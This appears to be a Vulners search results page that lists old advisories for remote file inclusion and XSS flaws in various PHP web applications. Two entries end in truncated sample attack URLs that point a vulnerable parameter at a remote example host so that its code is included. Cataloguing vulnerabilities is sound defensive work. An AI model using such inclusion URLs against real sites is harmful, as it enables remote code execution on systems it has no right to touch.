Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in
🔥 Daily Hot!
💪🏽 CPE Enhanced Advisories
🕶 Shadow Exploits
🕵🏼 Vulners CPE
🔐 Security news
💻 Exploit updates
📑 Blogs review
🐧 Linux vulnerabilities
🐞 Bugbounty
🤖 AI High Score
📰 CVE Feed
show all

13 matches found

seebug.org
seebug.orgadded 2014/07/01 12:0 a.m.13 views

Magic Photo Storage Website user/user_extend.php _config[site_path] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the...

7.1AI score
Exploits0
seebug.org
seebug.orgadded 2014/07/01 12:0 a.m.11 views

Edit-X Edit_Address.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/21974/info Edit-x is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the underlying...

7.1AI score
Exploits0
seebug.org
seebug.orgadded 2014/07/01 12:0 a.m.16 views

phpArcadeScript 2.0 displaygame.php gamefile Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/16957/info phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. An attacker may leverage these issues to have arbitrary...

7.1AI score
Exploits0
seebug.org
seebug.orgadded 2014/07/01 12:0 a.m.10 views

File Uploader 1.1 index.php config[root_ordner] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/25253/info File Uploader is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application...

7.1AI score
Exploits0
seebug.org
seebug.orgadded 2014/07/01 12:0 a.m.12 views

Magic Photo Storage Website user/logout.php _config[site_path] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the...

7.1AI score
Exploits0
seebug.org
seebug.orgadded 2008/03/04 12:0 a.m.13 views

GROUP-E 'head_auth.php'远程文件包含漏洞

BUGTRAQ ID: 28024 CNCAN ID:CNCAN-2008022903 GROUP-E是一款基于PHP的WEB应用程序。 GROUP-E不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB权限执行任意PHP代码。 问题是由于'headauth.php'脚本对用户提交的'CFGPREPENDFILE'参数处理缺少充分过滤,提交远程服务器的任意文件作为包含对象,可导致以WEB权限执行任意PHP代码。 GROUP-E GROUP-E 1.6.41 目前没有详细解决方案提供: http://www.group-e.info/...

6.9AI score
Exploits0
exploitpack
exploitpackadded 2007/12/24 12:0 a.m.20 views

Agares Media ThemeSiteScript 1.0 - loadadminpage Remote File Inclusion

Agares Media ThemeSiteScript 1.0 - loadadminpage Remote File Inclusion source: https://www.securityfocus.com/bid/26998/info ThemeSiteScript is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to...

0.5AI score
Exploits0
seebug.org
seebug.orgadded 2007/10/31 12:0 a.m.11 views

Sige Sige_Init.PHP远程文件包含漏洞

Sige是一款基于PHP的WEB应用程序。 Sige不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB权限执行任意PHP代码。 问题是由于'SigeInit.PHP'脚本对用户提交的'SYSPATH'参数缺少过滤,指定远程服务器上的任意文件作为包含参数,可导致以WEB权限执行任意PHP代码。 Sige 0.1 目前没有详细解决方案提供: http://sourceforge.net/projects/pfadmin http://www.example.com/inc/sigeinit.php?SYSPATH=http://example2.com/scripts/020.t...

7.1AI score
Exploits0
Exploit DB
Exploit DBadded 2007/08/09 12:0 a.m.20 views

Web News 1.1 - 'news.php?config[root_ordner]' Remote File Inclusion

source: https://www.securityfocus.com/bid/25257/info WebNews is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks...

7.4AI score
Exploits0
exploitpack
exploitpackadded 2007/02/12 12:0 a.m.15 views

Tagit! Tagit2b 2.1.B Build 2 - CONFIGerrmsg.inc.php?configpath Remote File Inclusion

Tagit! Tagit2b 2.1.B Build 2 - CONFIGerrmsg.inc.php?configpath Remote File Inclusion source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues...

7.5AI score
Exploits0
exploitpack
exploitpackadded 2007/01/09 12:0 a.m.11 views

Magic Photo Storage Website - includeconfig.php?_config[site_path] Remote File Inclusion

Magic Photo Storage Website - includeconfig.php?configsitepath Remote File Inclusion source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting...

0.3AI score
Exploits0
seebug.org
seebug.orgadded 2006/12/20 12:0 a.m.15 views

Azucar CMS Index_sitios.PHP远程文件包含漏洞

Azucar CMS是一款基于PHP的WEB应用程序。 Azucar CMS不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Indexsitios.PHP'脚本对用户提交的'VIEW'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Azucar CMS Azucar CMS 1.3 目前没有详细解决方案提供: http://azucarcms.sourceforge.net/...

7.1AI score
Exploits0
seebug.org
seebug.orgadded 2006/12/11 12:0 a.m.23 views

CM68 News Oldnews.Inc.PHP远程文件包含漏洞

CM68 News是一款基于PHP的WEB应用程序。 CM68 News不充分过滤用户提交的URI输入,远程攻击者可以利用漏洞以WEB进程权限执行任意指令。 问题是'Oldnews.Inc.PHP'脚本对用户提交的'addpath'参数缺少过滤,指定远程服务器上的任意文件作为包含对象,可导致以进程权限执行任意指令。 CM68 News 12.02.06 http://www.cm68.de/ http://www.example.com/engine/oldnews.inc.php?addpath=http://www.example2.com...

7.1AI score
Exploits0
Rows per page
Query Builder